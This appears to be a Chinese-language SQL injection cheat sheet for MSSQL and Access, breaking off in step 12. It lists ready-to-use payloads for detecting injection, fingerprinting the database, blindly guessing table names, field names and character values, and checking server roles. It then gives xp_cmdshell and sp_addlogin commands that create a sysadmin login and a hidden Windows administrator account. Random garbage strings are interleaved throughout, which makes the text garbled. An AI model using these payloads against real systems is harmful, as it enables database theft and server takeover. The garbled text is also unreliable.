1.判断是否有注入;and 1=1 ;and 1=2 H`..)zL|
2.初步判断是否是mssql ;and user>0 ~DS9{Y
P?-44m#
3.注入参数是字符'and [查询条件] and ''=' e=$xn3)McY
*)sz]g|d
4.搜索时没过滤参数的'and [查询条件] and '%25'=' eesLTyD2_
(8/xSOZ[
5.判断数据库系统 |W[rywxx
J@-9{<
;and (select count(*) from sysobjects)>0 mssql @Kb~!y@G
}tq9 /\
;and (select count(*) from msysobjects)>0 access +OP' /
3hjwwLKG$
3
+9|7=d
;0{*V5A
6.猜数据库 ;and (select Count(*) from [数据库名])>0 vCr$miZ
f4^_FK&
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 `{;&Qcg6m
IKj1{nZvDc
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 `2+52q<FO
'KrkCA
9.(1)猜字段的ascii值(access) cMKh+r
5Uz(Bi
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 7guxkN#
7]53GGNO
(2)猜字段的ascii值(mssql) eeZ9 w~<
g#NUo/
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 nr6U>
KR^
eHIC'b.
10.测试权限结构(mssql) <<6#Uz.1
bsDUFXH]
[#H8Mb+7
D]y.!D{l2
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 9a,CiH%@
[X\2U4
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- b&&'b)
w%na n=
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- yFv3>\
Tl-B[CT
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- .v!e=i}.
z81!F'x;
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 3"RZiOyv
oZw#Nd
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- U{m:{'np(H
QJ'C?hn
;and 1=(select IS_MEMBER('db_owner'));-- -hfY:W`Dz
u{^Kyo#v
o^J&c_U\3'
bBL"F!.
11.添加mssql和系统的帐户 }3e+D
\6L=^q=
;exec master.dbo.sp_addlogin username;-- ".=EAXVU
;exec master.dbo.sp_password null,username,password;-- |'#NDFI>}
-JkO[IF
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 0}!lN{m?
*?\Nioii
;exec master.dbo.xp_cmdshell 'net user username password <#Dc(VhT
F*u;'K
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
c7 -j
|&.)_+w
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 5}VP-04vh
l"Q8`
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- $tJJ
>"
2q bpjm
~CscctD{;
su$juI{
12.(1)遍历目录 w0SgF/"@
+/'jX?7x%
;create table dirs(paths varchar(100), id int) +g&W